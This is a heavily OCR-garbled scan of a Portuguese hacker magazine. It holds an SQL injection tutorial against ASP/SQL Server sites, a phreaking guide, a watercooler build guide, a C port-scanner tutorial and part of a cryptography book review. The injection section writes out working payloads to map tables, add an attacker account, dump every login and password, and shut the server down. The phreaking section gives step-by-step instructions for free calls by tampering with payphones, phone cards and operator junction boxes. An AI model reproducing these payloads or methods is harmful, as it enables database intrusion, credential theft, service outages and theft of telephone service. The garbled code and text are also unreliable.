comentário dentro daquela string, e não será processada pelo 
interpretador do SQL. Dessa forma, você entrará simplesmen- 
te designando o username. Wo 

Creio que agora está entendido o uso do caractere de co- 
mentário. Vamos seguir em frente. 

Caso você não saiba o nome de algum campo da tabela, ou 
até mesmo não saiba o nome de alguma tabela, podemos 
usar as mensagens de erro do SQL para conhecer mais sobre 
as tabelas do site. Façamos da seguinte forma no campo de 
usuário: 

Usuário: * having 1=1 — 

Senha: xyz 


O erro dado será parecido com o abaixo: 

Microsoft OLE DB Provider for ODBC Drivers error 
80040814" 

IMicrosoftJJODBC SQL Server Driver]fsQL ServerJColumn 
“usuarios. CODIGO" is invalid in the select list because it is not 
contained in an aggregate function and there isno GROUP BY 
clause. 

/arquivo.asp, line 94 

Agora você já sabe o nome da tabela (usuarios) e o nome do 
primeiro campo (codigo) da consulta na tabela. Como foi usa- 
do *, este campo é o primeiro a ser retornado. 

Se fosse usada uma string do tipo: 

SQL = “select nome, login, senha, nível, cpf from usuarios 
where ....” 


O que ia ser retornado é usuarios. NOME, pois é o primeiro 
campo da pesquisa. 

Se você montar uma outra string dentro do campo nome, 
saberá o próximo campo da tabela: 

Usuário: “ group by usuarios.codigo having 1=1 -- 

Senha: xyz 


Isso produzirá o seguinte erro: 

Microsoft OLE DB Provider for ODBC Drivers error 
80040814" 

[MicrosoftODBC SQL Server DriverilsQL ServeriColumn 
“usuarios. login" is invalid in the select list because itis not contained 
in either an aggregate function or the GROUP BY clause. 
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/arquivo.asp, line 94 

Você agora pode gerar erros assim até saber todos os cam- 
pos que serão retornados da string SQL. Basta, para isso, divi- 
dir os campos com vírgula, assim: 

Usuário: “group by usuarios.codigo, usuanos.login having 1=1 -- 


Quando você não obtiver mais nenhuma mensagem de erro, 
significa que todos os campos já estão validados e constam na 
string. Nesse ponto, você já saberá todos os campos, e a or- 
dem em que eles virão. 

É interessante saber o tipo de cada campo. Para isso, vamos 
obrigar o SQL a gerar um novo erro: 

Usuário: * union select sum(login) from usuarios -- 


O erro aparece como: 

Microsoft OLE DB Provider for ODBC Drivers error 
'80040607' 

[MicrosoftJIODBC SQL Server Driverl[SQL Server]The sum or 
average aggregate operation cannot take a varchar data type 
as an argument. 

/arquivo.asp, line 94 

Isso informa que o campo login é do tipo varchar. Mas se, 
por acaso, a mensagem de erro vier da forma a seguir, é por- 
que o campo em questão é do tipo numérico. 

Microsoft OLE DB Provider for ODBC Drivers error 
80040014" 

[MicrosoftlODBC SQL Server DriverllSQL Serverjall queries 
in an SQL statement containing a UNION operator must have 
an equal number of expressions in their target lists. 

/arquivo.asp, line 94 

Agora que você já sabe o nome da tabela, os nomes dos 
campos e seus respectivos tipos, vamos ao próximo passo, que 
é usar o caractere de "faz mais alguma coisa”, o excelentíssimo 
ponto-e-vírgula. 

Usuário: “, insert into usuarios (nome, login, senha, nivel, 
cof) values ( “Geek”, “haxo”, “p4ss”, 1, “12345678900') — 


Preciso explicar!? Bem, isso faz uma inclusão na tabela usu- 
ários de um registro, no qual tem o username sendo haxo e a 
senha p4ss, o que permitiria a você ser um novo usuário do 
site, desta vez, devidamente registrado. 

Obviamente, isso não se restringe a tabelas de usuários. 
Serve para qualquer tabela no site, como matérias, enquetes, 
colunas e até mesmo alguma tabela que guarde dados finan- 
ceiros, como cartões de crédito ou outras coisas. 

Uma técnica boa para descobrir o conteúdo dos campos é 
atribuir um campo texto a um campo numérico. Por exemplo, 


vamos supor que o site, em um determinado momento, faça 
referência a uma matéria dentro dele por um código numérico, 
do tipo idm=432. Daí, podemos descobrir um usuário fazendo 
o seguinte esquema.na URL: 


www .siteemasp. tld/pagina.asp ?idm = (select min(login) from 
usuarios) — ã 
O erro retornado será assim: 

Microsoft OLE DB Provider for ODBC Drivers error '80040€07' 

[MicrosoftODBC SQL Server Driver]SQL ServerJSyntax error 
converting the varchar value “anderson” to a column of data 
type int. 

/arquivo.asp, line 94 

Ou seja, sabemos que o menor login (na ordem alfabética) é 
Anderson. Isto acontece desta forma direta, pois dentro do 
SQL a comparação de números não pode ter aspas simples, e o 
campo pode ser comparado com uma nova string SQL, desde 
que entre parênteses. 

Agora podemos também descobrir sua senha dessa forma: 


www, siteemasp. tld/pagina.asp?idm = (select senha from 
usuarios where login='anderson') — 

Microsoft OLE DB Provider for ODBC Drivers error '80040e07" 

[Microsoft/ODBC SQL Server DriverlSQL ServerlSyntax error 
converting the varchar value “I4quatorze” to a column of data 
type int. 

/arquivo.asp, line 94 

Agora conhecemos um usuário e uma senha real do site. Cla- 
ro que se a senha do Anderson fosse numérica, apareceria uma 
matéria qualquer, mas bastaria pegar o ID da matéria, em algum 
lugar do código-fonte, ou até mesmo na barra de endereços 
(caso ela mudasse), e saberiamos a senha dele do mesmo jeito. 

Uma outra situação, bem mais complexa e avançada, é a cri- 
ação de SQL Transactions, que nada mais é do que um peque- 
no script que roda dentro do SQL e retorna uma resposta pro- 
gramada. 

A linha seguinte manda que seja criada uma Transact SQL, 
concatenando todos os usuários e senhas da tabela e 
retornando em uma mensagem. 


Usuário: “7 begin declare Bret varchar(8000) set Cret="" 
select Cret=Oret+' “+login+/+senha from usuarios where 
ogin>Bret select Bret as ret into alluser end — 


Depois de enviado, isso cria uma tabela chamada a//usercom 
um campo nomeado como ret, que contém um único registro 


com todos os logins e senhas concatenados. 

Para ver o resultado disso, basta executar a URL de matérias, 
desta vez, selecionando este campo da nova tabela: 

www. siteemasp. tlffpagina.asp?idm = (select ret from alluser) — 


O retorno será alguma coisa desse tipo: 

Microsoft OLE DB Provider for ODBC Drivers error 
80040807" 

[Microsoft/ODBC SQL Server DriverllSQL Server]Syntax error 
converting the varchar value “: atadmin/umasenha user3/abcd 
anderson/1 4quatorze' to a column of data type int 

/arquivo.asp, line 94 


Depois de ver os dados da nova tabela, apague-a: 
Usuário: * drop table alluser — 


Captaram a mensagem? Isso é quase tudo que se pode 
fazer com o SQL Server, quando mal programado dentro de 
uma ASP. Existem pessoas que acham que simplesmente limi- 
tando o tamanho de um campo dentro do formulário já estão 
se prevenindo de selecis e outros comandos mais. Imagine- 
mos um campo de usuário limitado em 12 caracteres: 

Usuário: “shutdown -- 


Exatos 12 caracteres. Isso derrubará todo o SQL Server da 
máquina, atingindo também outros sites que usarem este ser- 
vidor. Se limitar em menos, existe a alternativa de fazer direto 
no endereço da URL, como foi mostrado no caso do ID de uma 
matéria do site. 

Existem ainda formas de, por comandos em SQL, executar 
comandos arbitrários dentro do server que roda o SQL Server. 
Você, por exemplo, poderia obter o Dir de um cà ou até mes- 
mo criar e apagar arquivos dentro da máquina. Mas isso é um 
outro assunto. Por hora, tá bom. 

Vale lembrar que todas as situações descritas aqui funcionam 
em sites com SQL Server. Em sites que têm um MDB como banco 
de dados, os selects funcionarão, mas coisas como SQL Transact 
e alguns outros comandos peculiares ao SQL Server não. 

Você é programador de um site (ou vários) em ASP e está 
perplexo com tudo isso, pois todos os sites que você fez estão 
vulneráveis a esse erro? Você precisa de uma solução rápida 
para consertar todos eles? Infelizmente, não existe. Você terá 
que verificar o conteúdo de cada variável dentro da própria 
ASP antes de colocá-la dentro de um comando SQL. Difícil e 
penoso? Pois é... quem mandou escolher essa profissão... 


Marcelo Gomes (marce/oBtotalsecurity. com.br) 
é analista de sistemas, programador e administrador da 
Total Security (www. totalsecurity. com.br) 
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, Radiador onde a 
água é resfriada 


os dias de hoje, os coolers têm uma atenção toda 
especial na montagem de um bom micro. Isso 
por causa do aumento da liberação de calor do 


processador e também para fazer um overclock 
básico no processador. 
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Há um tempo, os coolers eram simples ventoinhas, às quais 
ninguém dava o menor valor — também, a corrente de ar que 
eles geravam era ridícula! Em contrapartida, com sua refrige- 
ração pífia, os processadores dessa época também não dissi- 
pavam tanto calor como hoje. De uma certa forma, era tudo 
equivalente... Mas, atualmente, os processadores (principal- 
mente os AtlonXP) extrapolaram a emissão de calor que se 
possa chamar de aceitável. Com isso, os coolers tiveram que 
evoluir em um ritmo muito acelerado para suprir essa necessi- 
dade de resfriamento. No entanto, os resultados não são dos 
melhores... Preços relativamente altos, e um barulho que pode 
deixar você louco! 

Nesta onda de cada vez mais deixar o case de seu computa- 
dor o mais “fresco” possível, surgiu uma alternativa muito 
efetiva, mas também mais cara, trabalhosa e, de certo modo, 
perigosa se você não tomar os devidos cuidados: o watercooler. 

O watercooler é um cooler que funciona à base de água. A 
água tem uma propriedade muito mais efetiva em absorver o 
calor de algum objeto do que o ar. E é nessa característica 
principal que o waterblock se baseia. Além desta qualidade, 
ele também é bem mais silencioso que os coolers atuais, o que 


faz dele uma escolha muito boa se você tiver um certo conhe- 
cimento em hardware. 


Composição de um watercooler 

Um watercooler, na verdade, é um mecanismo de 
resfriamento bem simples, formado por poucos componen- 
tes. São eles: 

Wiaterblock: se parece muito com um dissipador comum. 
O diferencial é que por ele passa a água do sistema, que se 
encarrega de resfriar o processador. É uma peça importantíssi- 
ma na montagem de um watercooler. Ele pode ser feito de 


cobre, de alumínio ou de um misto dos dois. O mais recomen- 
dado, certamente, é o de cobre, pois sua eficiência em dissipar 
o calor é maior em comparação à do alumínio... Agora, se você 
tiver um pouco, digamos, MUITO dinheiro pra gastar com isso, 
pode usar um waterblock inteirinho de prata, um dos metais 
existentes que mais dissipa calor! 

Radiador: tem a mesma função de um radiador automotivo. 
Neste caso, resfriar a água quente que vem do waterblock. 
Quanto maior for o radiador maior será sua capacidade de 
dissipação” de calor. 

Ventoinhas: as ventoinhas são acopladas ao radiador para 
ajudar na dispersão do calor que se aloja nele. Boas ventoi- 
nhas são, fundamentais para o bom funcionamento do radia- 
dor, mas tenha bom senso e não escolha ventoinhas muito 
barulhentas. 

ae 

Waterpump (bomba d'água): geralmente, é o mesmo 
usado em aquários. Sua função é bombear a água por todo o 
sistema do watercooler. Como esse aparelho é feito para fun- 
cionar ininterruptamente dentro de aquários, ele se torna algo, 
de certo modo, seguro. Mas é sempre bom tomar cuidado! 
Existem dois tipos de bombas que podem ser usadas nessa 
situação: as exteriores, que são usadas fora do case, e a 
submersa, que fica dentro de um container de água, dentro 
do case. 

Container: é usado se você utilizar um modelo de bomba 
d'água que fique submerso na água. Com isso, ele pode ficar 
dentro do case, contribuindo para questões de espaço e de 
estética também. 

Ele funciona da seguinte maneira: a água sai do container, 
chega até o radiador, é resfriada, vai para o waterblock, onde 
ela esquenta devido ao calor do processador, e volta para o 
container. Tudo isso acontecendo sucessivamente... 


Fazendo um waterblock 

Fazer um waterblock simples, mas bastante funcional, não é 
uma tarefa das mais complicadas, contudo se torna algo tra- 
balhoso se você não tiver nenhuma experiência com o manu- 
seio e corte de metais pesados. Isso, na verdade, não é um 
grande problema, pois várias pessoas podem fazer esse traba- 
lho pra você. Se você tiver algum parente que trabalhe nessa 
área fica ainda mais fácil. Caso contrário, só mediante o paga- 
mento a empresas especializadas em tratamentos de metais 
brutos, funilarias e até uma serralheria. 


Waterblock já 
perfurado 


Por dentro de um 
waterblock 


Para construir um waterblock em casa, ou mandar alguém 
fazer, você obrigatoriamente precisará ter um bloco de cobre ou 
de alumínio, dependendo da performance que esperar de um 
waterblock. Lógico que se você for investir em um projeto des- 
ses, é melhor comprar o melhor produto, que neste caso é o 
cobre. Uma placa de cobre com mais ou menos 2 cm de altura e 
6 cm de comprimento e 10 de largura é o suficiente para fazer 
um block. Você terá que ter também os pinos para o encaixe da 
mangueira, mas isso pode ser encontrado em depósitos. 

A primeira coisa depois de obter esses materiais é determi- 
nar o tamanho do block que você vai fazer. Isso depende do 
seu processador, mas sempre se deve tentar fazer ele um pou- 
co menor que o seu processador, porque se o block for grande 
demais, ele poderá até danificar o soquete de sua placa-mãe, 
visto que o cobre é um metal bem pesado. 

Desenhe no bloco de cobre o tamanho que você quer que 
seu block tenha. Agora está na hora de colocar a mão na mas- 
sa! Se não tiver uma broca profissional e uma máquina que 
corte metal em casa, leve o bloco de cobre já demarcado a 
alguma funilaria, que eles fazem esse serviço para você. 

Com o block já cortado nas medidas corretas, é hora de 
fazer os orifícios onde a água vai circular. O modo mais prático 
para se fazer os orifícios é esse que é mostrado na foto, pois 
desta forma a água é bem distribuída, e quanto mais ela per- 
correr por dentro do block, mais eficaz será seu efeito de 
resfriamento. 

Terminando essa fase, que certamente é a mais complicada 
da montagem, você terá que lixar bem a sua peça. Forre uma 
superfície realmente plana com uma lixa, fixe-a bem na super- 
fície e comece a lixar. Comece com uma lixa numero 400 e vá 
mudando até chegar ao número perto da lixa 1200. É bom dar 
uma molhada com água no block quando você perceber que 
está difícil de lixar. É importante que o block fique 100% pla- 
no, pois o seu pleno contato com o processador é que vai 
indicar o bom funcionamento do watercooler. 

Pronto! Seu waterblock feito manualmente saiu muito mais 
barato do que se fosse comprado em lojas especializadas! 
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PHREAKING 
mm The ultimate 


E Ortanens cido = " por Dream Surfer Corporation 
a Ê e. chico dreamsurferohotmail.com. 


e início, falaremos um pouco de PHREAKING: Não 
adianta apenas ser “adestrado”, mas saber como 
e por que se faz 
Nesta edição, começaremos com telefones: fi- 
xos e públicos — como tirar o máximo proveito deles. Primeira 
Coisa a saber: é impossível ligar da sua casa sem pagar!!! Não 
colocarei “mitos” ou informações que não foram testadas 
Exemplo disso é o “famoso” truque de colocar um cartão no 
telefone, ligar e, quando a pessoa atender, segurar o 9 qu'0/0 
(zero) até acabar a ligação. Alguém sempre pagará a conta: 
Mesmo que seja a operadora. Tenha isso em mente. É grátis 
apenas para você! E isso é crime!!! Não nos culpe, pois apenas 
mostraremos a porta. Atravessá-la é com você. 

O que vou mostrar é o que alguns sabem e muitos “nao 
sabiam que sabiam isso”. Entao, se quiser colaborar conosco, 
esteja a vontade, pois não quero ser o dono do pedaço, mas 
um divulgador de informações. 


O primeiro desejo é ligar de telefones bloqueados 
São aqueles telefones de empresa que possuem um cadea- 
do bloqueando o teclado ou mesmo algum código de segu- 
rança. Este truque também funciona com telefones públicos, 
mas os modelos deyem ser antigos. 
Primeiro, você deve saber o que é o gancho. É onde se colo- 
ca o fone, onde se bate para dar linha. A seguir, você deve 


colocar o telefone no modo PULSE (caso seja o fixo da empre- 
sa). Só funciona em orelhões que usem o modo PULSE. 


Agora é só seguir a sequência: o número que você quer ligar 
é 3823-2647 (número fictício). 

Você deve diminuir 10 em todos os algarismos que com- 
põem o telefone a ser discado. No caso, este telefone ficaria: 


Número a ser discado: 3823-2647 


(7-10)=3 
O novo número será: 7287-8463 
O que você terá que fazer é bater no gancho (rapidamente) 
o número de vezes correspondente à subtração. 


Bata sete vezes no gancho (intervalo de 2 segundos) 
Bata duas vezes no gancho (intervalo de 2 segundos) 
Bata oito vezes no gancho (intervalo de 2 segundos) 
Bata sete vezes no gancho (intervalo de 2 segundos) 
Bata oito vezes no gancho (intervalo de 2 segundos) 
Bata quatro vezes no gancho (intervalo de 2 segundos) 
Bata seis vezes no gancho (intervalo de 2 segundos) 
Bata três vezes no gancho (intervalo de 2 segundos) 


Desta maneira, você poderá fazer ligações sem pedir ao seu 
supervisor ou chefe. 


Princípio: Lembra daqueles telefones de discar com disco? O 
processo é o mesmo. Quando a gente discava neles, era preci- 
so girar o disco até o número que se queria discar. Quando 
tirava o dedo, o disco girava interrompendo o fluxo contínuo 
do sinal, mesmo processo que nós vimos. Então, por que se 
deve diminuir 10 do número a ser discado? 

Simples. A corrente está vindo pelo gancho, e não pelo dis- 
co. Ou seja, é um atalho. Quando estiver ágil, poderá ligar 
mais rápido, aí fica fácil! 


O truque do cartão telefônico infinito 
Algumas dicas para fazer com cartões, que realmente funcionam. 
Os cartões de orelhão funcionam da seguinte forma: eles 
são formados por microfusíveis queimados por indutância. 
Assim, quando você insere o cartão no orelhão, através de um 
“sensor”, ele verifica quantos microfusíveis ainda estão “liga- 
dos”. As dicas que funcionam: 


ESMALTE 

Pegar um cartão telefônico comum e passar um esmalte 
incolor (base) na tarja do cartão (que precisa estar cheio). Esta 
base impede o cartão de “queimar” os créditos. Pinte a tarja 
de maneira que fique fina, para evitar que o cartão fique gros- 
so demais e não passe na leitora. 


35 


PAPEL-ALUMÍNIO 

É só pegar um pedaço de papel-alumínio ou mesmo aquele 
papel que reveste o maço de cigarros e enrolar bem forte no 
cartão, para usar à vontade (mas cuidado, pois isso facilita um 
choque gostoso! Eu já levei. Acreditem, “abriu meus horizon- 
tes” por quase uma hora...). ; 


SILICONE 

Este é o método mais fácil e comprovado por mim. Pegue 
aquele silicone (transparente), passe uma camada bem fina 
(fina mesmo) e deixe secar. Mais tarde, você verá um cartão 
que funciona infinitamente, pois o silicone impede a fusão do 
microfusível. 


CARTÃO CIBERNÉTICO 

Esta dica tem que ser realizada com muita paciência, pois se 
você errar alguma coisa, estraga tudo? Primeiramente, consiga 
um estúpido cartão telefônico zerado! Lixe-o dos dois lados 
com aquela lixa bem fina e deixe-o em repouso durante três 
ou quatro minutos. Passado este tempo, você perceberá que a 
tinta do cartão saiu, e a confecção deste ficou simples de bur- 
lar. É um negócio assim: 


o- -0 0- -0 0- -o | Verso do cartão com os microfusíveis já 
sem o contato 
o- -0 0- -0 0- -o | E assim sucessivamente... 


Ligue um fio em cada bolinha, como mostra o desenho ( o- 
o ), coloque um papel-alumínio bem fino para interligar as 
duas bolinhas, ou um fio bem fino. 


NH | Papel-alumínio (mostrado ampliado) 


| ollo | Bolinhas ligadas com uma tira de papel laminado 


lo—o o—o o—o | Ou com nosso fio bem fino 


Cubra da bolinha | até a 2 com o nosso amigo papel-alumí- 
nio ou com o fio fino. Presto! Agora é só curtir com os amigos 
do ICQ que moram em outros estados!!! 


Efetuando ligações gratuitas de um telefone 
público, utilizando um diodo 

O diodo é um componente eletrônico que possui diversas 
utilizações. Podemos resumir seu funcionamento, basicamen- 
te, na seguinte síntese: um diodo (ou jun '* aum PN) permite 


que a corrente circule em apenas uma direção dentro de um 
circuito. Ao utilizá-lo para o fim aqui desejado, precisaremos 
de um diodo IN4002, IN4004 ou IN4007. Estes podem ser 
encontrados facilmente em qualquer casa de componentes 
eletrônicos. Vamos precisar também de um resistor com valor 
nominal de 22KQ e potência de 1W. Mãos à obra! 

Basta ligar o diodo em paralelo com o resistor (conforme 
tenta mostrar a ilustração abaixo). Em seguida, descasque os 
fios do telefone e ligue cada uma das pontas obtidas com o 
diodo e o resistor neles. Lembre-se: você vai apenas descascar 
os fios do orelhão! Se você cortá-los, ele ficará sem linha. E 
nosso objetivo não é destruir, mas aproveitar o máximo que 
nos é “oferecido”! 


01 
+—— ++ + II 


Fio do telefone | (representado 
pelas linhas duplas na vertical) 


+ UNO) - Il /diodoM| 


Yresistor/| 


Em 01, o fio “chega” da central. Em 02, o fio vai para o 
telefone. Ou seja, você precisa descascar o fio, antes de ele 
chegar ao orelhão. Para executar esta tarefa, eu aconselho que 
você descasque os fios dos orelhões que utiliza com mais fre- 
quência, pois devido ao fato de os fios do telefone público 
serem muito grossos, não é um trabalho que se faça tranquila 
e rapidamente, sem ser notado. 

Você deve observar também a polarização correta a ser utili- 
zada. Isso é percebido facilmente, pois se você ligar o diodo de 
maneira errada, o orelhão ficará sem linha. 

Alguns orelhões comuns têm uma proteção blindada que 
impede o acesso ao cabo telefônico, embora seja possível puxar 
o fio com um gancho, que você deve colocar do lado esquerdo 
do aparelho telefônico, entre o telefone e uma grade preta de 
sustentação que fica atrás dele. Eu aconselho evitar esses tipos, 
a não ser que você tenha a GOLD KEY para abri-los. 

Vamos voltar um pouco para a parte técnica da coisa. O 
diodo que estamos utilizando vai funcionar da seguinte ma- 
neira: quando urna ligação é completada de um telefone pu- 


blico, a central inverte a polarização do 
telefone de -48 para 48 volts. 

Quando o aparelho telefônico per- 
cebe isso, ele pede uma “unidade do 
cartão”. Aí entra em funcionamento o 
nosso querido diodo. Ele permite que 
a tensão caia até O (zero) volts, mas não 
permite que ela se torne positiva. Des- 
sa forma, o orelhão não pedirá a “uni 
dade do cartão”. O resistor funciona 
apenas como um dissipador de potência, para que você não 
dê o azar de queimar o diodo. 

Mesmo se você não achar nenhuma loja que venda um 
diodo, pegue uma placa antiga de alguma coisa que tenha 
queimado. Ela sempre tem diodos. Você deve procurar uma 
peça pequenininha com dois terminais, preta, na qual normal- 
mente esteja escrito IN. 


Efetuando ligações com seu pequeno telefone 
em um orelhão 

Esta técnica é a minha preferida, pois além de mostrar aos 
seus amigos (só se você quiser) como você conhece o sistema 
(háháhá), dá até pra vender o seu “protótipo” e tirar uma 
graninha. 

Aqui vai o esquema de montagem do seu telefone: 

1 - Consiga seu telefone. Pode ser qualquer um, mas mos- 
tro como se faz com o meu, que é super discreto. Lembre-se: 
ao usar esse tipo de conector, retire também o fone do ore- 
lhão. Assim você disfarça melhor... Caso use um telefone “co- 
mum”, é só fazer as devidas alterações 

2 - Note que ele tem um fone Hand Set 

3 - Pegue um conector de telefone (aquele em que você 
conecta o cabo do telefone), desmonte e retire a parte em que 
se coloca o cabo telefônico. Retire-a com os dois fios que a 
compõem 

4 — Solde nas pontas dos fios um par de fios extra, para 
aumentar o alcance e não forçar os originais do conector. Em 
cada ponta dos fios extras coloque um 
“jacarezinho”, como mostrado na fi- 
gura (um vermelho e um preto) 

5 - Conecte o cabo telefônico no te- 
lefone portátil e em nosso adaptador 

6 - Agora é só montar tudo e prepa- 
rar-se para o orelhão 


Você deve chegar ao orelhão de ma- 
drugada (de preferência) e colocar a 
mão atrás do aparelho. Você sentirá 


CONECTOR DA LINHA 


que tem um fio duplo. Com muito cui- 
dado, puxe-o para o lado e descas- 
que os dois fios! Ou, se conseguir, 
abra-o com uma chave (se você tiver 
uma que funcione. Dica: tente desde 
as mais finas até as mais largas. Pos- 
suo duas: uma LAND 2 e uma GOLD 
426. Paulo). Pronto, agora é só che- 
gar ali, conectar seu pequeno telefo- 
ne aos fios do orelhão, e pronto. Você 
tem uma linha para ligar para qualquer lugar, desde que o 
orelhão permita. 

Dica: você pode conectar um notebook e navegar normal- 
mente com gastos pagos pela operadora. 

Mas não abuse, pois no final de cada mês, as opera- 
doras fazem um check-in de quanto tempo o orelhão 
foi usado. E se notarem que alguém falou por uma se- 
mana seguida, prepare-se para conhecer a força de eli- 
te da polícia. 


Efetuando ligações gratuitas de caixas de veri- 
ficação (caixas da operadora) 

Para efetuar uma ligação de dentro destas caixas, basta pe- 
gar um dos diversos pares de fios que lá se encontram e ligá- 
los ao seu pequeno telefone comum portátil ou a um notebook. 
Não se esqueça de colocar os fios que você tirou no lugar, para 
que nem o pessoal da manutenção e nem o titular da linha 
percebam. Para saber quem é o dono da linha, leve seu telefo- 
ne celular (na próxima edição, falaremos deles) e ligue para 
você mesmo. 

Como essas caixas de verificação costumam se situar em vias 
bem movimentadas, a prática desse tipo de ligação é 
desaconselhada. Mas toda a regra tem sua exceção. Vale lem- 
brar que, destas caixas, é possível efetuar telefonemas para 
qualquer lugar, inclusive chamadas internacionais, pois são 
linhas comuns de telefones! 

Dica: as caixas de verificação são aquelas caixas cinzas que 
existem em todos os bairros. Parecem 
um armário grande. Se você encontrar 
uma aberta, phreak até não poder mais. 
Depois coloque um cadeado para os 
IRLA's da vida não descobrirem que 
você mexeu, pois não terão como abrir. 

Na próxima edição, falaremos sobre 
celulares. Serão inúmeras dicas que os 
fabricantes e as operadoras não divul- 
gam. Os motivos são óbvios: monopó- 
lio da informação. 
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Novas Funções 

Estamos novamente aqui, na segunda parte de nosso tutorial 
de sockets, prontos para mostrar novas funções e montar um 
pequeno scanner de portas, baseado no protocolo TCP. Em 
nosso primeiro capítulo, vimos algumas funções básicas e es- 
tudamos o princípio do funcionamento dos sockets. 

Neste novo capítulo, estudaremos duas funções básicas que 
mostrarão novas funcionalidades. Vamos a elas: 


programação dedicad 


por Am 


A função getservbyport(): 
Esta função permite determinar que serviço está sendo exe- 
cutado em uma determinada porta TCP. A mesma baseia-se 
no arquivo services, utilizando-o como referência. Ele necessi- 
ta da declaração abaixo, no início de seu programa: 

&include <netdb.h> 


Onde o protótipo da função é descrito da seguinte maneira: 
struct servent *getservbypori(int port, const char *proto); 


Onde a estrutura servent está definida da seguinte forma na 
biblioteca netdb.h: 

struct servent ( 

char *s name; 

char **s aliases; 

int s port; 

char *s proto;) 


Vamos analisar cada item deste structure abaixo: 
a) s name — Nome dado ao serviço, dentro da estrutura TCP/ 
IP. Por exemplo: Telnet, SMTP, etc. 

b)s aliases = Uma lista de nomes alternativos aos serviços. 
Uma espécie de apelido que os mesmos podem possuir 

c) s port - O número da porta na qual o serviço está sendo 
executado, referenciado pelo Network Byte Order 

d)s proto — O nome do protocolo que será utilizado com 
este serviço (TCP ou UDP) 


A função gethostbyname(); 

Esta função permite que utilizemos o nome de domínio no 
lugar de seu IP. Um exemplo: podemos digitar 
www.destino.com.br, em vez de seu endereço IP. Ele necessita 
da declaração abaixo; no início de seu programa: 

ginclude <netdb.h> 


Onde o protótipo da função é descrito da seguinte maneira: 
Hdefine h addr h addr. list[0] 

struct hostent ( 

char *h name; 

char **h aljases; 

int h addrtype; 

int h length; ni 

char **h addr. list; 

); 


Vamos analisar cada item deste structure abaixo: 

a) h name — Nome do domínio (Domain Name) host 

b) h aliases — Lista alternativa de nomes para este host 

c) h addrtype — O tipo do endereço que está retirando na 
conexão. Em nosso capítulo |, vimos que podem ser quatro: 
AF INET, AF UNIX, AF ISSO e AF NS 

d) h length — Tamanho em bytes do endereço 

e) h addr list - Uma array terminada em zero do endereço 
da rede utilizado pelo host 

f) host.h addr - Utilizado para a tradução do 
endereçamento para o serviço de DNS 


O Grande Exemplo |: 
Eis aqui o scanner que já apresentei anteriormente no meu 
artigo sobre scanners. Vamos listá-lo abaixo: 


Hinclude <stdio.h> 
*include <string.h> 
Hinclude <stdlib.h> 
Hinclude <unistd.h> 
tinclude <sys/types.h> 
tinclude <sys/socket.h> 
Hinclude <netinet/in.h> 
*include <netdb.h> 
ttinclude <arpa/inet.h> 
tinclude <signal.h> 


*define maxproc 20 


void scan(char *); 
void timeout(); 


FILE *fp; 

char *arquivo; 

char *endereco; 

char *opcao; 

int msocket; 

struct sockaddr. in alvo; 

int conector, a, portai, portaf, portas, childs = 0; 


int main(int argc, char *argv[]) 


! 


printf("1033[2)"); 
printf(1033[1;1H"); 


prá 19 
printf("== Scanner de portas TCP =Nn) 
print(“== Por Marcelo - 


Antonio 


amarceloObufferoverflow.org ==n"); 


priê- 1) 
if (arge == 1) ( 


fprintf(stderr, 
“Uso: %s <endereco> <portai> <portaf> -| logfilein”, 
argv[0)); 


exit(0); 

) 

if (arge > 1) 1 
endereco = (argv[1]); 
arquivo = endereco; 


portal = 1; 
portaf = 65000; 
) 

if (arge > 2) ( 


portai = atoi((char *) argv[2]); 
portaf = atoi((char *) argv[3]); 
) 


if (argc > 3) ( 
endereco = (argv[1)); 
arquivo = endereco; 


) 


E E RS SST 


if (argc > 4)( 

opcao = ++(argv[4]); 
if (*opcao == 19) 
arquivo = (argv[5]);. 


) 
signal(SIGALRM, timeout); 


if ((fp = fopen(arquivo, “w+")) == NULL) | 
perror(“fopen()"); 

exit(-1); 

) 


a=0; 

portas = portal; 

fprintf(fp, “ —— — — An“); 
fprintf(fp, “— Resultado AN); 

fprintí(to, “ An); 
scan(endereco); 

printf("Feito! Veja os resultados no arquivo de login”); 
return (0); 

fclose(fp); 

) 


void timeout() 


í 


conector = -1, 


) 


void scan(char *endereco) 


f 


[*Testa TCP */; 
while (portas <= portaf) ( 


/*Declaracao do Socket*/; 
msocket = socket(AF. INET, SOCK STREAM, 0); 


if (msocket < 0) ( 
perror(“socket()”); 
continue; 


) 


alvo.sin family = AF INET; 
alvo.sin port = htons(portas); 
alvo.sin addr.s addr = inet addr(endereco); 


bzero(&(alvo.sin zero), 8); 


fprinti(stderr, “N033[36mScanning: N033[37m”); 
fprinti(stderr, "%ir”, portas); 


alarm(5); 


/* Teste do Socket*/ 


conector = 

conneci(msocket, (struct sockaddr *) &alvo, sizeof(alvo)); 
alarm(0); 

if (conector < 0) ( 

/* printf(“Porta TCP Inativa %in”, portas); */ 
close(conector); 

close(msocket); 

a++; 

portas++; 

continue; 


) 
fprintf(fp, “Conexao aceita na porta TCP %dinin”, portas); 


at+; 
portas++; 

close(conector); 
close(msocket); 


) 
) 


Eis a proposta de nossa primeira parte acima feita para vocês 
modificarem a seu bel prazer. Proponho, para os mais ousa- 
dos, um desafio: montar um scanner que resolva pôr nome no 
lugar do IP. 


Próximos Passos 

Na nossa próxima lição, desvendaremos o segredo da cone- 
xão com as funções bind(), accept() e listen(). Com isso, podere- 
mos entender como certos serviços funcionam, e teremos, en- 
tão, subsídios para a montagem de um backdoor. 


Antonio Marcelo (amarceloQbutferoverflow.com.br) é especialista em 
segurança e diretor de tecnologia e negócios da empresa BufferOverflow 
Informática (yww.burferoverflow.com.bn. É autor de quatro livros sobre Linux 
entre eles Linux Ferramentas Anti hackers, publicado pela editora Brasport. 
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Livro conta a história da criptografia 


O que você sabe sobre 
criptografia? Conhece 
Sie Singã apenas alguns algoritmos 


| alivroscúdigas "e programas? Sabe toda 


A pera ai eco e 


a parte técnica, mas nada 
sobre a história? Não im- 
porta seu grau de conhe- 


cimento sobre o assunto; 
se você mexe com infor- 
mática, precisa ler O Livro dos Códigos, da edito- 
ra Record: 

A obra é escrita pelo Ph.D. em física, Simon 
Singh, autor de O último teorema de Fermat 
Entre as maiores qualidades do livro, está a apre- 
sentação de um completo contexto histórico, 
contando de onde vem a criptografia, desde os 
tempos do Egito Antigo até os dias de hoje, com 
o uso na informática. 

Um episódio contado com detalhes é a Segun- 
da Guerra Mundial, em que os codebreakers dos 
Aliados desempenharam uma função decisiva 
para a vitória. A quebra das chaves do Enigma, 
graças ao sistema Bombe, criado por Alan Turing, 
é descrita em clima de thriller de suspense. 

O livro também não foge de discutir a polêmica 
da criptografia em tempos de revolução da 
informática. Hoje, o grande problema da 
encriptação é a resistência dos EUA em permitir a 
